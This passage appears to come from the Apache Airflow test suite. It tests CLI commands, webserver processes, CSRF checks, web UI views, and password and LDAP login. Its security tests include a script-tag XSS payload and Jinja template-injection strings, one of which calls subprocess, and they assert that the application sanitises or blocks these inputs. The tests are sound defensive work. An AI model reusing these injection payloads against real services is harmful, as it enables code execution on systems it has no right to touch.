cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as f:
pool_config_output = json.load(f)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
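        # Poll once per second until the pid file exists and contains a
        # parseable integer pid, then return it.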
while True:
try:
with open(pidfile) as f:
return int(f.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except Exception:
            # an exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
        # The HTML should contain data for the last run: a link to the specific
        # run and the text of its date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
        }).replace("&", "&amp;")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=missing_dag',
follow_redirects=True)
self.assertIn("seems to be missing", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=section-1-task-1&"
"dag_id=example_subdag_operator.section-1&future=false&past=false&"
"upstream=false&downstream=true&recursive=true&"
"execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.end",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1.section-1-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-3",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-4",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-5",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.some-other-task",
response.data.decode('utf-8'))
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=EXAMPLE_DAG_DEFAULT_DATE,
end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
        # In Python 2.7 no conversion back to str is required
        # In Python >= 3 the setter must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_unicode_user_authenticate(self):
self.password_user.username = u"🐼" # This is a panda
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://openldap:389")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
        The fake snakebite client.
        :param path: the array of paths to test
        :param include_toplevel: whether to include the top-level directory info
        :return: a list of file/directory info dicts for the matching paths
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
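            # Includes two in-flight "copying" entries so that tests can
            # exercise filtering of ignored extensions (e.g. _COPYING_).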
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
                'modification_time': 1481122343862,
                'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
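# Hedged usage sketch (an illustrative addition, not part of the original
# suite): the fake hooks above are meant to stand in for the real
# snakebite-backed HDFSHook when exercising HDFS sensors without a cluster,
# assuming the Airflow 1.x HdfsSensor signature that accepts a `hook` argument:
#
#   task = HdfsSensor(task_id='check_datafile',
#                     filepath='/datadirectory/datafile',
#                     hook=FakeHDFSHook)
#   task.poke(context=None)  # truthy, because the fake client lists the file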
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
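        # An AIRFLOW_CONN_<CONN_ID> environment variable takes priority over a
        # connection with the same conn_id stored in the metadata database.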
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
